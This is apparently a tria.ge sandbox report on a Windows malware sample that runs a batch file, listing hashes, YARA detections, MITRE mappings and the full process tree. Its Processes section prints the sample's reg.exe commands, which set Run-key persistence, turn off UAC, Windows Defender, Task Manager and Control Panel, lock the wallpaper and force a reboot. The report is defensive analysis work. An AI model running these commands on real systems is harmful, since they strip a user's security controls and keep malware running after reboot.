Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
41s -
max time network
47s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
04/02/2024, 05:51
Behavioral task
behavioral1
Sample
240204-b61b1seff6.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
240204-b61b1seff6.exe
Resource
win10v2004-20231215-en
Errors
General
-
Target
240204-b61b1seff6.exe
-
Size
11.5MB
-
MD5
cbefa3dd01682c7ae01476a35c069ca8
-
SHA1
0a7fde7402d314993d0b77b87b796f480c8bbec4
-
SHA256
9a8a71e84dbbcea6ca2286d811db5d2df586d01e13654b034f77ffd6dbed599a
-
SHA512
41a1dff4610230d1cf72c0c42b6c7eef8a12c991cb42ed28cd2268f20f1978b14fba9e17081cdbe411963bc7dcd3273046d1ddc7427f6d9cc117ea592833ed8d
-
SSDEEP
196608:knW3NrRSIGB4e6rVwKQ8QNeL8W6sXh9rcWdTXfxo5FKKxuAUKPZ7CwI7qMh:kn/r6CKENjsXr9TX5rKRCwI7
Malware Config
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe -
Detects executables embedding registry key / value combination indicative of disabling Windows Defender features 3 IoCs
resource yara_rule behavioral1/memory/1104-19-0x0000000000400000-0x00000000014D1000-memory.dmp INDICATOR_SUSPICIOUS_EXE_RegKeyComb_DisableWinDefender behavioral1/files/0x0033000000015491-22.dat INDICATOR_SUSPICIOUS_EXE_RegKeyComb_DisableWinDefender behavioral1/memory/1104-34-0x0000000000400000-0x00000000014D1000-memory.dmp INDICATOR_SUSPICIOUS_EXE_RegKeyComb_DisableWinDefender -
UPX dump on OEP (original entry point) 3 IoCs
resource yara_rule behavioral1/memory/1104-0-0x0000000000400000-0x00000000014D1000-memory.dmp UPX behavioral1/memory/1104-19-0x0000000000400000-0x00000000014D1000-memory.dmp UPX behavioral1/memory/1104-34-0x0000000000400000-0x00000000014D1000-memory.dmp UPX -
Disables Task Manager via registry modification
-
resource yara_rule behavioral1/memory/1104-0-0x0000000000400000-0x00000000014D1000-memory.dmp upx behavioral1/memory/1104-19-0x0000000000400000-0x00000000014D1000-memory.dmp upx behavioral1/memory/1104-34-0x0000000000400000-0x00000000014D1000-memory.dmp upx -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\mbrsetup = "c:\\windows\\winbase_base_procid_none\\secureloc0x65\\mbrsetup.exe" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\gdifuncs = "c:\\windows\\winbase_base_procid_none\\secureloc0x65\\gdifuncs.exe" reg.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1603059206-2004189698-4139800220-1000\Control Panel\Desktop\Wallpaper = "c:\\bg.bmp" reg.exe -
Drops file in Windows directory 6 IoCs
description ioc Process File created \??\c:\windows\winbase_base_procid_none\secureloc0x65\gdifuncs.exe cmd.exe File opened for modification \??\c:\windows\winbase_base_procid_none\secureloc0x65\gdifuncs.exe cmd.exe File created \??\c:\windows\winbase_base_procid_none\secureloc0x65\mainbgtheme.wav cmd.exe File opened for modification \??\c:\windows\winbase_base_procid_none\secureloc0x65\mainbgtheme.wav cmd.exe File created \??\c:\windows\winbase_base_procid_none\secureloc0x65\mbrsetup.exe cmd.exe File opened for modification \??\c:\windows\winbase_base_procid_none\secureloc0x65\mbrsetup.exe cmd.exe -
Modifies registry key 1 TTPs 5 IoCs
pid Process 2788 reg.exe 2608 reg.exe 1204 reg.exe 1224 reg.exe 1952 reg.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeShutdownPrivilege 2900 shutdown.exe Token: SeRemoteShutdownPrivilege 2900 shutdown.exe -
Suspicious use of WriteProcessMemory 47 IoCs
description pid Process procid_target PID 1104 wrote to memory of 2832 1104 240204-b61b1seff6.exe 29 PID 1104 wrote to memory of 2832 1104 240204-b61b1seff6.exe 29 PID 1104 wrote to memory of 2832 1104 240204-b61b1seff6.exe 29 PID 1104 wrote to memory of 2832 1104 240204-b61b1seff6.exe 29 PID 2832 wrote to memory of 2788 2832 cmd.exe 30 PID 2832 wrote to memory of 2788 2832 cmd.exe 30 PID 2832 wrote to memory of 2788 2832 cmd.exe 30 PID 2832 wrote to memory of 2788 2832 cmd.exe 30 PID 2832 wrote to memory of 2608 2832 cmd.exe 32 PID 2832 wrote to memory of 2608 2832 cmd.exe 32 PID 2832 wrote to memory of 2608 2832 cmd.exe 32 PID 2832 wrote to memory of 2608 2832 cmd.exe 32 PID 2832 wrote to memory of 1252 2832 cmd.exe 34 PID 2832 wrote to memory of 1252 2832 cmd.exe 34 PID 2832 wrote to memory of 1252 2832 cmd.exe 34 PID 2832 wrote to memory of 1252 2832 cmd.exe 34 PID 2832 wrote to memory of 2652 2832 cmd.exe 35 PID 2832 wrote to memory of 2652 2832 cmd.exe 35 PID 2832 wrote to memory of 2652 2832 cmd.exe 35 PID 2832 wrote to memory of 2652 2832 cmd.exe 35 PID 2832 wrote to memory of 2652 2832 cmd.exe 35 PID 2832 wrote to memory of 2652 2832 cmd.exe 35 PID 2832 wrote to memory of 2652 2832 cmd.exe 35 PID 2832 wrote to memory of 1204 2832 cmd.exe 36 PID 2832 wrote to memory of 1204 2832 cmd.exe 36 PID 2832 wrote to memory of 1204 2832 cmd.exe 36 PID 2832 wrote to memory of 1204 2832 cmd.exe 36 PID 2832 wrote to memory of 1224 2832 cmd.exe 37 PID 2832 wrote to memory of 1224 2832 cmd.exe 37 PID 2832 wrote to memory of 1224 2832 cmd.exe 37 PID 2832 wrote to memory of 1224 2832 cmd.exe 37 PID 2832 wrote to memory of 2572 2832 cmd.exe 38 PID 2832 wrote to memory of 2572 2832 cmd.exe 38 PID 2832 wrote to memory of 2572 2832 cmd.exe 38 PID 2832 wrote to memory of 2572 2832 cmd.exe 38 PID 2832 wrote to memory of 1952 2832 cmd.exe 39 PID 2832 wrote to memory of 1952 2832 cmd.exe 39 PID 2832 wrote to memory of 1952 2832 cmd.exe 39 PID 2832 wrote to memory of 1952 2832 cmd.exe 39 PID 2832 wrote to memory of 320 2832 cmd.exe 40 PID 2832 wrote to memory of 320 2832 cmd.exe 40 PID 2832 wrote to memory of 320 2832 cmd.exe 40 PID 2832 wrote to memory of 320 2832 cmd.exe 40 PID 2832 wrote to memory of 2900 2832 cmd.exe 41 PID 2832 wrote to memory of 2900 2832 cmd.exe 41 PID 2832 wrote to memory of 2900 2832 cmd.exe 41 PID 2832 wrote to memory of 2900 2832 cmd.exe 41
Processes
-
C:\Users\Admin\AppData\Local\Temp\240204-b61b1seff6.exe"C:\Users\Admin\AppData\Local\Temp\240204-b61b1seff6.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1104 -
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\4CF8.tmp\HorrorTubies.bat""2⤵
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:2832 -
C:\Windows\SysWOW64\reg.exereg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v mbrsetup /d c:\windows\winbase_base_procid_none\secureloc0x65\mbrsetup.exe /f3⤵
- Adds Run key to start application
- Modifies registry key
PID:2788
-
-
C:\Windows\SysWOW64\reg.exereg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v gdifuncs /d c:\windows\winbase_base_procid_none\secureloc0x65\gdifuncs.exe /f3⤵
- Adds Run key to start application
- Modifies registry key
PID:2608
-
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d c:\bg.bmp /f3⤵
- Sets desktop wallpaper using registry
PID:1252
-
-
C:\Windows\SysWOW64\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2652
-
-
C:\Windows\SysWOW64\reg.exereg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /f3⤵
- Modifies registry key
PID:1204
-
-
C:\Windows\SysWOW64\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f3⤵
- UAC bypass
- Modifies registry key
PID:1224
-
-
C:\Windows\SysWOW64\reg.exeReg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f3⤵PID:2572
-
-
C:\Windows\SysWOW64\reg.exeREG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f3⤵
- Modifies registry key
PID:1952
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoControlPanel" /t REG_DWORD /d "1" /f3⤵PID:320
-
-
C:\Windows\SysWOW64\shutdown.exeshutdown /r /t 003⤵
- Suspicious use of AdjustPrivilegeToken
PID:2900
-
-
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x01⤵PID:2684
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x11⤵PID:692
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5f014698e88eda534c88ce46a17e34d3c
SHA15f33f606179fea1404144d60af54fb829ea108b5
SHA25635eda9f76ede828a68e030a5b966fbf6a8c3f67146099eb0a866fb492733c909
SHA51279360bdc41762c105fecb07ca97fb4336394d2189f111b7040643d02c12481561aaf6b47c91c685cb7e4396c1a37d8c8eff5d4965baafe83894948316b35805f
-
Filesize
2.2MB
MD5a91e5b7686d4f631a2bdf654a3a491f1
SHA1d5760f5c7463b588b0c74bbc86237aed136b9fe9
SHA25645991d6379452ead78a54e3be31eb3fe9c6ae386737482192ded081832044aea
SHA51286cee44d58c7d9ed51caffb6cb6b55184a3c4653dc76ca41f4bb8a7c5bef9b67cf7f920db2111c1a838930bf9171ff49e17e042d9d0ce13205f13e7a364e1a3d
-
Filesize
76KB
MD59b104d42649fa52651a2ec25d7e48322
SHA1d9fe22ef9daf5055519ebb9e4137a7b6b5ffc030
SHA25623aef8bc6d0dcad2089fd08ec5932aba5feab3972b07583fa50d4c794eca5af9
SHA51255794cbd02f8678fdc44dced755ba4cf9d4ed63a30bded6635dc5403ffa2435339422288d48a8ef31fe523b080359b051e86ec8f6823b891e83ed1495fa5daa8
-
Filesize
13.1MB
MD51c723b3b9420e04cb8845af8b62a37fa
SHA13331a0f04c851194405eb9a9ff49c76bfa3d4db0
SHA2566831f471ee3363e981e6a1eb0d722f092b33c9b73c91f9f2a9aafa5cb4c56b29
SHA51241f4005ec2a7e0ee8e0e5f52b9d97f25a64a25bb0f00c85c07c643e4e63ea361b4d86733a0cf719b30ea6af225c4fcaca494f22e8e2f73cda9db906c5a0f12ae
-
Filesize
1.3MB
MD54f9777b4f603a437abedb856d09d42ba
SHA19a50bdb720e937ae6a8fd4140233b600414b393e
SHA256c5309feb33af8626132eb1a44e528c3317b5499a87170044eadc56ae82b1bacd
SHA512c6971d5256feb8ebd75b758055843870fd1beede3430efc82f4e3f0dae56d9b9241b0ac8c653d5f5ab3fe61a80729c4e096b169d16d2e09ccb7efcc0be8d49a8